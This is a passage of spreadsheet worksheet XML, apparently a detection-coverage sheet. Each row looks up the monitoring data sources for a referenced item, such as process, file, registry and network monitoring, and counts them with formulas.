        <v>Windows Registry,DLL monitoring,Loaded DLLs</v>
      </c>
      <c r="C123" s="17" t="s">
        <v>193</v>
      </c>
      <c r="D123" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E123" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F123" s="13"/>
      <c r="G123" s="19"/>
    </row>
    <row r="124" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A124" s="16" t="s">
        <v>194</v>
      </c>
      <c r="B124" s="13" t="str">
        <f>LOOKUP(A124,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,File monitoring</v>
      </c>
      <c r="C124" s="17" t="s">
        <v>34</v>
      </c>
      <c r="D124" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E124" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F124" s="13"/>
      <c r="G124" s="19"/>
    </row>
    <row r="125" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A125" s="16" t="s">
        <v>195</v>
      </c>
      <c r="B125" s="13" t="str">
        <f>LOOKUP(A125,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,API monitoring</v>
      </c>
      <c r="C125" s="17" t="s">
        <v>115</v>
      </c>
      <c r="D125" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E125" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F125" s="13"/>
      <c r="G125" s="19"/>
    </row>
    <row r="126" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A126" s="16" t="s">
        <v>196</v>
      </c>
      <c r="B126" s="13" t="str">
        <f>LOOKUP(A126,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,API monitoring</v>
      </c>
      <c r="C126" s="17" t="s">
        <v>100</v>
      </c>
      <c r="D126" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E126" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F126" s="13"/>
      <c r="G126" s="19"/>
    </row>
    <row r="127" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A127" s="16" t="s">
        <v>197</v>
      </c>
      <c r="B127" s="13" t="str">
        <f>LOOKUP(A127,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Packet capture,Authentication logs</v>
      </c>
      <c r="C127" s="17" t="s">
        <v>198</v>
      </c>
      <c r="D127" s="13">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E127" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F127" s="13"/>
      <c r="G127" s="19"/>
    </row>
    <row r="128" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A128" s="16" t="s">
        <v>199</v>
      </c>
      <c r="B128" s="13" t="str">
        <f>LOOKUP(A128,'REF-DataSources'!A:C)</f>
        <v>Process monitoring</v>
      </c>
      <c r="C128" s="17">
        <v>100</v>
      </c>
      <c r="D128" s="13">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E128" s="13">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F128" s="13"/>
      <c r="G128" s="19"/>
    </row>
    <row r="129" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A129" s="16" t="s">
        <v>200</v>
      </c>
      <c r="B129" s="13" t="str">
        <f>LOOKUP(A129,'REF-DataSources'!A:C)</f>
        <v>DLL monitoring,Windows Registry,Process monitoring</v>
      </c>
      <c r="C129" s="17" t="s">
        <v>193</v>
      </c>
      <c r="D129" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E129" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F129" s="13"/>
      <c r="G129" s="19"/>
    </row>
    <row r="130" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A130" s="16" t="s">
        <v>201</v>
      </c>
      <c r="B130" s="13" t="str">
        <f>LOOKUP(A130,'REF-DataSources'!A:C)</f>
        <v>API monitoring,DLL monitoring,File monitoring,Process monitoring</v>
      </c>
      <c r="C130" s="17" t="s">
        <v>202</v>
      </c>
      <c r="D130" s="13">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E130" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F130" s="13"/>
      <c r="G130" s="19"/>
    </row>
    <row r="131" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A131" s="16" t="s">
        <v>203</v>
      </c>
      <c r="B131" s="13" t="str">
        <f>LOOKUP(A131,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Digital certificate logs</v>
      </c>
      <c r="C131" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D131" s="13">
        <f t="shared" ref="D131:D194" si="5">LEN(TRIM(B131))-LEN(SUBSTITUTE(TRIM(B131),",",""))+1</f>
        <v>2</v>
      </c>
      <c r="E131" s="13">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F131" s="13"/>
      <c r="G131" s="19"/>
    </row>
    <row r="132" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A132" s="16" t="s">
        <v>204</v>
      </c>
      <c r="B132" s="13" t="str">
        <f>LOOKUP(A132,'REF-DataSources'!A:C)</f>
        <v>DLL monitoring,Windows Registry,Loaded DLLs</v>
      </c>
      <c r="C132" s="17" t="s">
        <v>15</v>
      </c>
      <c r="D132" s="13">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E132" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F132" s="13"/>
      <c r="G132" s="19"/>
    </row>
    <row r="133" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A133" s="16" t="s">
        <v>205</v>
      </c>
      <c r="B133" s="13" t="str">
        <f>LOOKUP(A133,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
      <c r="C133" s="17" t="s">
        <v>10</v>
      </c>
      <c r="D133" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E133" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F133" s="13"/>
      <c r="G133" s="19"/>
    </row>
    <row r="134" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A134" s="16" t="s">
        <v>206</v>
      </c>
      <c r="B134" s="13" t="str">
        <f>LOOKUP(A134,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C134" s="17">
        <v>100</v>
      </c>
      <c r="D134" s="13">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E134" s="13">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F134" s="13"/>
      <c r="G134" s="19"/>
    </row>
    <row r="135" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A135" s="16" t="s">
        <v>207</v>
      </c>
      <c r="B135" s="13" t="str">
        <f>LOOKUP(A135,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Access tokens,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C135" s="17" t="s">
        <v>72</v>
      </c>
      <c r="D135" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E135" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F135" s="13"/>
      <c r="G135" s="19"/>
    </row>
    <row r="136" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A136" s="16" t="s">
        <v>208</v>
      </c>
      <c r="B136" s="13" t="str">
        <f>LOOKUP(A136,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Network protocol analysis,Process use of network</v>
      </c>
      <c r="C136" s="17" t="s">
        <v>176</v>
      </c>
      <c r="D136" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E136" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F136" s="13"/>
      <c r="G136" s="19"/>
    </row>
    <row r="137" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A137" s="16" t="s">
        <v>209</v>
      </c>
      <c r="B137" s="13" t="str">
        <f>LOOKUP(A137,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Authentication logs,Windows event logs</v>
      </c>
      <c r="C137" s="17" t="s">
        <v>210</v>
      </c>
      <c r="D137" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E137" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F137" s="13"/>
      <c r="G137" s="19"/>
    </row>
    <row r="138" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A138" s="16" t="s">
        <v>211</v>
      </c>
      <c r="B138" s="13" t="str">
        <f>LOOKUP(A138,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Windows Registry,File monitoring</v>
      </c>
      <c r="C138" s="17" t="s">
        <v>77</v>
      </c>
      <c r="D138" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E138" s="13">
        <f t="shared" ref="E138:E201" si="6">LEN(TRIM(C138))-LEN(SUBSTITUTE(TRIM(C138),";",""))+1</f>
        <v>4</v>
      </c>
      <c r="F138" s="13"/>
      <c r="G138" s="19"/>
    </row>
    <row r="139" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A139" s="16" t="s">
        <v>212</v>
      </c>
      <c r="B139" s="13" t="str">
        <f>LOOKUP(A139,'REF-DataSources'!A:C)</f>
        <v>Loaded DLLs,System calls,Windows Registry,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C139" s="17" t="s">
        <v>30</v>
      </c>
      <c r="D139" s="13">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E139" s="13">
        <f t="shared" si="6"/>
        <v>5</v>
      </c>
      <c r="F139" s="13"/>
      <c r="G139" s="19"/>
    </row>
    <row r="140" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A140" s="16" t="s">
        <v>213</v>
      </c>
      <c r="B140" s="13" t="str">
        <f>LOOKUP(A140,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C140" s="17" t="s">
        <v>15</v>
      </c>
      <c r="D140" s="13">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E140" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F140" s="13"/>
      <c r="G140" s="19"/>
    </row>
    <row r="141" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A141" s="16" t="s">
        <v>214</v>
      </c>
      <c r="B141" s="13" t="str">
        <f>LOOKUP(A141,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C141" s="17" t="s">
        <v>215</v>
      </c>
      <c r="D141" s="13">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E141" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F141" s="13"/>
      <c r="G141" s="19"/>
    </row>
    <row r="142" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A142" s="16" t="s">
        <v>216</v>
      </c>
      <c r="B142" s="13" t="str">
        <f>LOOKUP(A142,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,User interface,PowerShell logs</v>
      </c>
      <c r="C142" s="17" t="s">
        <v>89</v>
      </c>
      <c r="D142" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E142" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F142" s="13"/>
      <c r="G142" s="19"/>
    </row>
    <row r="143" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A143" s="16" t="s">
        <v>217</v>
      </c>
      <c r="B143" s="13" t="str">
        <f>LOOKUP(A143,'REF-DataSources'!A:C)</f>
        <v>System calls,Process monitoring</v>
      </c>
      <c r="C143" s="17" t="s">
        <v>89</v>
      </c>
      <c r="D143" s="13">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E143" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F143" s="13"/>
      <c r="G143" s="19"/>
    </row>
    <row r="144" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A144" s="16" t="s">
        <v>218</v>
      </c>
      <c r="B144" s="13" t="str">
        <f>LOOKUP(A144,'REF-DataSources'!A:C)</f>
        <v>File monitoring</v>
      </c>
      <c r="C144" s="17">
        <v>100</v>
      </c>
      <c r="D144" s="13">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E144" s="13">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F144" s="13"/>
      <c r="G144" s="19"/>
    </row>
    <row r="145" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A145" s="16" t="s">
        <v>219</v>
      </c>
      <c r="B145" s="13" t="str">
        <f>LOOKUP(A145,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C145" s="17">
        <v>0</v>
      </c>
      <c r="D145" s="13">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E145" s="13">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F145" s="13"/>
      <c r="G145" s="19"/>
    </row>
    <row r="146" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A146" s="16" t="s">
        <v>220</v>
      </c>
      <c r="B146" s="13" t="str">
        <f>LOOKUP(A146,'REF-DataSources'!A:C)</f>
        <v>File monitoring</v>
      </c>
      <c r="C146" s="17">
        <v>100</v>
      </c>
      <c r="D146" s="13">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E146" s="13">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F146" s="13"/>
      <c r="G146" s="19"/>
    </row>
    <row r="147" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A147" s="16" t="s">
        <v>221</v>
      </c>
      <c r="B147" s="13" t="str">
        <f>LOOKUP(A147,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,File monitoring</v>
      </c>
      <c r="C147" s="17" t="s">
        <v>222</v>
      </c>
      <c r="D147" s="13">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E147" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F147" s="13"/>
      <c r="G147" s="19"/>
    </row>
    <row r="148" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A148" s="16" t="s">
        <v>223</v>
      </c>
      <c r="B148" s="13" t="str">
        <f>LOOKUP(A148,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,File monitoring</v>
      </c>
      <c r="C148" s="17" t="s">
        <v>222</v>
      </c>
      <c r="D148" s="13">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E148" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F148" s="13"/>
      <c r="G148" s="19"/>
    </row>
    <row r="149" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A149" s="16" t="s">
        <v>224</v>
      </c>
      <c r="B149" s="13" t="str">
        <f>LOOKUP(A149,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Authentication logs,File monitoring,Environment variable</v>
      </c>
      <c r="C149" s="17" t="s">
        <v>8</v>
      </c>
      <c r="D149" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E149" s="13">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F149" s="13"/>
      <c r="G149" s="19"/>
    </row>
    <row r="150" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A150" s="16" t="s">
        <v>225</v>
      </c>
      <c r="B150" s="13" t="str">
        <f>LOOKUP(A150,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C150" s="17" t="s">
        <v>15</v>
      </c>
      <c r="D150" s="13">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E150" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F150" s="13"/>
      <c r="G150" s="19"/>
    </row>
    <row r="151" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A151" s="16" t="s">
        <v>226</v>
      </c>
      <c r="B151" s="13" t="str">
        <f>LOOKUP(A151,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C151" s="17" t="s">
        <v>70</v>
      </c>
      <c r="D151" s="13">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E151" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F151" s="13"/>
      <c r="G151" s="19"/>
    </row>
    <row r="152" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A152" s="16" t="s">
        <v>227</v>
      </c>
      <c r="B152" s="13" t="str">
        <f>LOOKUP(A152,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C152" s="17" t="s">
        <v>89</v>
      </c>
      <c r="D152" s="13">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E152" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F152" s="13"/>
      <c r="G152" s="19"/>
    </row>
    <row r="153" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A153" s="16" t="s">
        <v>228</v>
      </c>
      <c r="B153" s="13" t="str">
        <f>LOOKUP(A153,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C153" s="17" t="s">
        <v>70</v>
      </c>
      <c r="D153" s="13">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E153" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F153" s="13"/>
      <c r="G153" s="19"/>
    </row>
    <row r="154" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A154" s="16" t="s">
        <v>229</v>
      </c>
      <c r="B154" s="13" t="str">
        <f>LOOKUP(A154,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C154" s="17" t="s">
        <v>193</v>
      </c>
      <c r="D154" s="13">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E154" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F154" s="13"/>
      <c r="G154" s="19"/>
    </row>
    <row r="155" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A155" s="16" t="s">
        <v>230</v>
      </c>
      <c r="B155" s="13" t="str">
        <f>LOOKUP(A155,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C155" s="17" t="s">
        <v>15</v>
      </c>
      <c r="D155" s="13">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E155" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F155" s="13"/>
      <c r="G155" s="19"/>
    </row>
    <row r="156" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A156" s="16" t="s">
        <v>231</v>
      </c>
      <c r="B156" s="13" t="str">
        <f>LOOKUP(A156,'REF-DataSources'!A:C)</f>
        <v>API monitoring,System calls,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C156" s="17" t="s">
        <v>8</v>
      </c>
      <c r="D156" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E156" s="13">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F156" s="13"/>
      <c r="G156" s="19"/>
    </row>
    <row r="157" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A157" s="16" t="s">
        <v>232</v>
      </c>
      <c r="B157" s="13" t="str">
        <f>LOOKUP(A157,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Process use of network</v>
      </c>
      <c r="C157" s="17" t="s">
        <v>8</v>
      </c>
      <c r="D157" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E157" s="13">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F157" s="13"/>
      <c r="G157" s="19"/>
    </row>
    <row r="158" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A158" s="16" t="s">
        <v>233</v>
      </c>
      <c r="B158" s="13" t="str">
        <f>LOOKUP(A158,'REF-DataSources'!A:C)</f>
        <v>File monitoring</v>
      </c>
      <c r="C158" s="17">
        <v>100</v>
      </c>
      <c r="D158" s="13">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E158" s="13">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F158" s="13"/>
      <c r="G158" s="19"/>
    </row>
    <row r="159" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A159" s="16" t="s">
        <v>234</v>
      </c>
      <c r="B159" s="13" t="str">
        <f>LOOKUP(A159,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C159" s="17" t="s">
        <v>70</v>
      </c>
      <c r="D159" s="13">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E159" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F159" s="13"/>
      <c r="G159" s="19"/>
    </row>
    <row r="160" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A160" s="16" t="s">
        <v>235</v>
      </c>
      <c r="B160" s="13" t="str">
        <f>LOOKUP(A160,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C160" s="17" t="s">
        <v>18</v>
      </c>
      <c r="D160" s="13">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E160" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F160" s="13"/>
      <c r="G160" s="19"/>
    </row>
    <row r="161" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A161" s="16" t="s">
        <v>236</v>
      </c>
      <c r="B161" s="13" t="str">
        <f>LOOKUP(A161,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C161" s="17" t="s">
        <v>18</v>
      </c>
      <c r="D161" s="13">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E161" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F161" s="13"/>
      <c r="G161" s="19"/>
    </row>
    <row r="162" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A162" s="16" t="s">
        <v>237</v>
      </c>
      <c r="B162" s="13" t="str">
        <f>LOOKUP(A162,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,Process monitoring,Process command-line parameters,File monitoring</v>
      </c>
      <c r="C162" s="17" t="s">
        <v>8</v>
      </c>
      <c r="D162" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E162" s="13">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F162" s="13"/>
      <c r="G162" s="19"/>
    </row>
    <row r="163" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A163" s="16" t="s">
        <v>238</v>
      </c>
      <c r="B163" s="13" t="str">
        <f>LOOKUP(A163,'REF-DataSources'!A:C)</f>
        <v>File monitoring,API monitoring</v>
      </c>
      <c r="C163" s="17" t="s">
        <v>18</v>
      </c>
      <c r="D163" s="13">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E163" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F163" s="13"/>
      <c r="G163" s="19"/>
    </row>
    <row r="164" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A164" s="16" t="s">
        <v>239</v>
      </c>
      <c r="B164" s="13" t="str">
        <f>LOOKUP(A164,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C164" s="17" t="s">
        <v>89</v>
      </c>
      <c r="D164" s="13">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E164" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F164" s="13"/>
      <c r="G164" s="19"/>
    </row>
    <row r="165" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A165" s="16" t="s">
        <v>240</v>
      </c>
      <c r="B165" s="13" t="str">
        <f>LOOKUP(A165,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C165" s="17">
        <v>0</v>
      </c>
      <c r="D165" s="13">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E165" s="13">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F165" s="13"/>
      <c r="G165" s="19"/>
    </row>
    <row r="166" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A166" s="16" t="s">
        <v>241</v>
      </c>
      <c r="B166" s="13" t="str">
        <f>LOOKUP(A166,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C166" s="17" t="s">
        <v>89</v>
      </c>
      <c r="D166" s="13">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E166" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F166" s="13"/>
      <c r="G166" s="19"/>
    </row>
    <row r="167" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A167" s="16" t="s">
        <v>242</v>
      </c>
      <c r="B167" s="13" t="str">
        <f>LOOKUP(A167,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C167" s="17" t="s">
        <v>15</v>
      </c>
      <c r="D167" s="13">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E167" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F167" s="13"/>
      <c r="G167" s="19"/>
    </row>
    <row r="168" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A168" s="16" t="s">
        <v>243</v>
      </c>
      <c r="B168" s="13" t="str">
        <f>LOOKUP(A168,'REF-DataSources'!A:C)</f>
        <v>Process monitoring</v>
      </c>
      <c r="C168" s="17">
        <v>100</v>
      </c>
      <c r="D168" s="13">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E168" s="13">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F168" s="13"/>
      <c r="G168" s="19"/>
    </row>
    <row r="169" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A169" s="16" t="s">
        <v>244</v>
      </c>
      <c r="B169" s="13" t="str">
        <f>LOOKUP(A169,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C169" s="17" t="s">
        <v>89</v>
      </c>
      <c r="D169" s="13">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E169" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F169" s="13"/>
      <c r="G169" s="19"/>
    </row>
    <row r="170" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A170" s="16" t="s">
        <v>245</v>
      </c>
      <c r="B170" s="13" t="str">
        <f>LOOKUP(A170,'REF-DataSources'!A:C)</f>
        <v>File monitoring</v>
      </c>
      <c r="C170" s="17">
        <v>100</v>
      </c>
      <c r="D170" s="13">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E170" s="13">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F170" s="13"/>
      <c r="G170" s="19"/>
    </row>
    <row r="171" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A171" s="16" t="s">
        <v>246</v>
      </c>
      <c r="B171" s="13" t="str">
        <f>LOOKUP(A171,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C171" s="17" t="s">
        <v>18</v>
      </c>
      <c r="D171" s="13">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E171" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F171" s="13"/>
      <c r="G171" s="19"/>
    </row>
    <row r="172" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A172" s="16" t="s">
        <v>247</v>
      </c>
      <c r="B172" s="13" t="str">
        <f>LOOKUP(A172,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Windows Registry,Packet capture,Netflow/Enclave netflow</v>
      </c>
      <c r="C172" s="17" t="s">
        <v>215</v>
      </c>
      <c r="D172" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E172" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F172" s="13"/>
      <c r="G172" s="19"/>
    </row>
    <row r="173" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A173" s="16" t="s">
        <v>248</v>
      </c>
      <c r="B173" s="13" t="str">
        <f>LOOKUP(A173,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Packet capture</v>
      </c>
      <c r="C173" s="17" t="s">
        <v>89</v>
      </c>
      <c r="D173" s="13">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E173" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F173" s="13"/>
      <c r="G173" s="19"/>
    </row>
    <row r="174" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A174" s="16" t="s">
        <v>249</v>
      </c>
      <c r="B174" s="13" t="str">
        <f>LOOKUP(A174,'REF-DataSources'!A:C)</f>
        <v>API monitoring,DLL monitoring,Process monitoring,Windows Registry,Windows event logs</v>
      </c>
      <c r="C174" s="17" t="s">
        <v>30</v>
      </c>
      <c r="D174" s="13">
